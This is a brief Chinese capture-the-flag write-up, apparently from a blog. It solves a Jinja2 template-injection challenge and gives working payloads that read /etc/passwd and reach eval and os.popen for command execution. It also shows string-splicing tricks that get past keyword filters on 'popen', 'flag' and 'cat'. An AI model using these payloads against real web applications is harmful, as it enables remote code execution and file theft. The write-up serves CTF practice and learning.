打开环境,根据题目的提示是ssti模板注入,刷题多的同学应该可以猜到get参数name,传入name={{7*'7'}}看一下,根据回显确定是JinJa2
找到这个类,是第99个
读取文件?name={{''.__class__.__base__.__subclasses__()[99].get_data(0,"/etc/passwd")}}
可以看到目前还没有被过滤,尝试读取flag文件,猜
这里对flag进行了替换,那尝试字符串拼接,这里“+”也被过滤了,换个思路命令执行吧
?name={{''.__class__.__bases__[0].__subclasses__()[80].__init__.__globals__}}查到可以执行命令的函数eval
发现过滤了popen,简单拼接
po"+"pen()拼接后回显提示缺少cmd参数,绕过有效
加入命令,看到回显确定执行成功
获取flag路径
cat flag发现又被过滤了
尝试用tail替换cat,用f"+"lag替换flag,拿到flag
最终payload
?name={{''.__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.eval("__import__('os').po"+"pen('tail%20f"+"lag').read()")}}
414
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
